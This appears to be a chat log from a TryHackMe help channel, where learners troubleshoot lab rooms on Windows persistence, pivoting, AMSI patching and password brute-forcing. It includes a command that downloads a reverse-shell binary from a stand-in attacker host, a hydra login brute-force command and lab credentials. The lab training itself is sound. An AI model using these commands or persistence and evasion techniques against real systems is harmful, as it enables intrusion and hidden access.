Thanks and how about this too any hint please ? Hey friends how y’all doing I need help with windows persistence task 4 abusing services after trying to create a service and while trying to execute I get this error = the service didn’t response to the start or control request in a timely fashion what I’m I doing wrong and do you all have to start the room all over again just cause you are not able to finish it and you won’t be able to retrieve the next flag cause you didn’t retrieve the last one just asking cause I had to start this over and over again cause I can’t finish it all at once

Gave +1 Rep to @echo ore

can you show a screenshot of the command you used to generate the service executable and what you are running to start it???

Same syntax provided for us from the question I did copy and paste directly to make sure I’m doing it right infact

I might have to go back to the question and set up my question since I already move to other room cause im having difficulty with it

finally finished that persistence room. It's a lot but I didn't have that much fun with a room for a long time. Congrats creator

including spaces after the = but not before???

A question about the next room. Pivoting https://tryhackme.com/room/lateralmovementandpivoting . It says I have 2 days of access left. Does that mean I have to finish it in 2 days and after that I can't access the room, the network, anymore. In case I want to redo it with better notes ?

Yes not before

I think that might be the issue right ?

¯_(ツ)_/¯

is this the first flag or the second ?

On task 8 in windows local persistence, when I try to access the aspx shell I get a 401 unauthorized error

You say ?

For the first one

It won’t let me start the service

That’s the issue I’m having

😭

dunno what the problem is

that went fine on my side, it took a while but it worked. check the shell or post it here

did you make them able to connect remotly???

I'm redoing it right now, let's see if I get the errpr

Thanks friend would appreciate and see how you are able to get it done

Gave +1 Rep to @manic umbra

Well I have the same issue myself try to run the flag script from rdp login rather than evil win

I had massive problems with that one. I've created a new connection, didn't reuse the edite adminsitrator connection (in remmina)

So do I

Bypassed it by running icacls

Everyone:F

oh wait thmuser3??? did you change the hex that you needed to change in registry???? if yes log in as the normal administrator account and then run the flag exe for that task

i cant pass from here

see the programs bar and the right most icon

should appears that window after the command psexec??

that is the regedit icon so it is open

still not working..

THMService I get the same error. But this command isn't important. You already have the password. You'll get the flag with msfvenom and a reverse shell with service THMService2

Don't use winrm, use remina or xfreerdp, create a connection with the user thmuser3 and password Password321

yay im trying but isnt connecting

And how are you able to get the payload on the system I try to use powershell -c wget it won’t work and even Invoke web-request and again since the service won’t start it’s so hard to make the Other part work since I would have to start the service to gain a reverse shell

in powershell wget ATTACKER_IP:8000/rev-svc.exe -O c:\windows\rev-svc.exe

python3 -m http.server on the attacker machine, of course

Thanks will give this a shot again

it worked for me a minute ago

even split view is gettin error

man, that was a weird one for me too. I was planning to redo it. So why not now, maybe I can help you somehow

if I find what task that is 😄

is getting very annoyng the task

many problem

since yestarday

yes, this one was but you'll get it

2 days doing the task

what task is this ?

got it

let's try

task 2, win local persistance

ive already make thmuser3 can connect remotly

but isnt connecting

not with the hash with evil winr

not split view

with Password321

I'll redo it now. I know that thmuser3 hasn't had remote connection privileges

yay... but ive changed the file...

got it!!!! thmuser3 flag done!!!!

finnaly connected!

this time I got it way easier too lol

nice!

what did you do different

I know I fcked up the first time because I didn't mark and replace the hex digits so I've actually added some isntead od replace it.

maybe that's the reason

shut down the machine

XD

so if some of the mods or the creator can answer my question. Because the room is still resetting and I can't do anything

this one

helps more often than not 😄

yeah... trying flag 4

after the reverse shell on flag4 should i can get the flag?

oh no... is flag 5

Anyone having issues with task 4 in windows privesc room? Netcat using both kali and attackbox don't want to connect, currently out of my house so I can't use my VM to see if it's a me issue or if it's a step issue, and yes I did reread and restart the VM twice

Found the issue, might need to restart your attackbox/kali instance if using the online VM's

hi, make the changes but not getting reverse shell, task 3, flag 6 win local persistance..

Don't worry about that. You'll just have to rejoin the room, but your progress won't be affected in any way. This is just a way to cope with inactive users hogging on lab seats 😬

You are changing the wrong progID. "textfile" != "txtfile"

Only one task to finish!

Everything

Signature Evasion task 7

OMG!!! thank a lot!!!!

Gave +1 Rep to @echo ore

Did anyone have a big issue getting Armitrage set up? It says it won't connect to the database, but I've verified that it is started. I'm on a fresh ubuntu OS.

@scarlet barn yeah man even after setup i had so many config errors, i ended up skipping that part lol

Lol sounds good. I'll just use sliver then

Thanks @twin tundra

Gave +1 Rep to @twin tundra

I ended up with 535976... oh dear... what is the expected length of the clinic file?

^ This is for the result of using the rule in 'hints' for user burgess btw

I ^C'ed it after 15 minutes because it seemed a bit excessive and very likely 'cause I did something wrong somewhere in there

upped the tasks to 64 simultaneous but nothing yet

oh my goodness... it was one real dumb mistake... welp

got it

hi people, im not having permisio to open flag9 on task 4 wins local persistance... any idea?

and cant delete SD file

You need to open regedit as SYSTEM to delete those entries. You are probably just opening it as administrator, which is not enough

so i must repeat some task before it? cause my time was off so a restarted ip

al flags are independent, so you can go straight away for flag9

but, even if dont erase that file, if i get reverse shell, why i shouldnt get the flag?

Because you need to hide your task from the user, for which erasing the SD entry is a must. The flag executable is checking for that

understood. so after rdp as administrator Password321 i must become SYSTEM right?

yes, there are instructions on that on the task as well 🙂

OK thank

Gave +1 Rep to @echo ore

ooohh that was cause i was opening the registry editor from serchin and not from powershell with psexec right?

that is correct!

OMG so stupid...

nice! room done!

FYI usually a better idea to install ruby libraries via gem install which will give you newer versions than what apt has.

Hi guys, anyone having problems using dig on Attackbox for the domain transfer task in the enumeration room? I always get "The term 'dig' is not recognized as the name of a cmdlet...."

I fixed it

was using it on the windows machine^^

hydra -l burgess -P burgess.txt 10.10.104.200 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

having a problem with the syntax

Please any help

isnt it supposed to be http-form-post?

Don't see no issue with the syntax

No, http-post-form is right

it is http-post-form....missed that,it was the error

There wasn't an error,it wasn't connecting......so I restarted the machine

Thanks guys

Hello mate I’m trying to solve lateral movement and according to the instructions if you are using your personal computer you need to set the dns and again set a default one too in confuse as thus is the first time I will be doing something like thus how do I get that done please, the picture above is what have tried but it won’t let me save it so I’m confuse

How does your code look like to attack the burgess account? @naive sundial

Someone’s kindly look into this for me thanks

but if you are using BURP suit you are doing something I cannot troubleshoot

I don't have experience with BURP for the moment

so maybe someone else can help

And this command is also not correct

I don't think so

because it is the intention you have a longer wordlist due to the single extra rule

it is still missing items

like /login-post/ should be /login-post/index.php

and on the end you should use S=logout.php instead of F= ..

I don't have them here, my Kali VM is at home 😅

you should have a result in less than a minute

if it takes two minutes, it is already wrong

so you don't have to cross the complete wordlist

:Q

you are just typing some commands without understanding imo

but ok

yes, i guess. But I'll try to configure it with somethiung else

wait who are you? Bonzo = W4h33D? 😄

No, wrong window lol 😄

sorry, was writing why pivoting network doesn't work, with another guy 😄

Runtime Detection Evasion

Task 7 - Patching AMSI

who can help please? :/

any help with task

i have been trying for 3days

Did you check the hint?

Yes

What seasons did you put as password?

I get no flag 😦

Spring, Fall, Winter, Summer

So how is your password list looking like ?

DNS resolution keeps dropping on my Lateral Movement and Pivoting room... any experiencing this too? restarting the systemd-resolved service does the trick but it is kind of frustrating

Are you having your personal machine ?

nope... AttackBox

Hello mate I’m trying to use my own Kali any idea how to config the dns ?

I did... it works but once in a while it drops

and the file on the attackBox is /etc/systemd/resolved.conf

just add the DNS address to the DC under 'DNS=' as per the instructions

right but the instructions show the mods made to the other file

I omitted that part this time in reading though yeah... I was aware of that... it had just happened 2 or 3 times within the span of 5 minutes

yeah, I'll mess with the /etc/resolv.conf if it continues to do this

thanks @weak ice

Gave +1 Rep to @weak ice

can please someone help me with room "Runtime Detection Evasion" on Task 7 - Patching AMSI? I get no flag on the desktop?! when I run the script, I got a "true" as output in Power Shell? please help!

True but when I try to set it up I’m confuse as I’m stuck here

@weak ice

hello i have a problem in enumeration room task3 question 2 what is the version numer i copy it from a attack box(i have the maschine started and the attack box as they requested) and there is a wrong anwser any help?

picture?

quick ss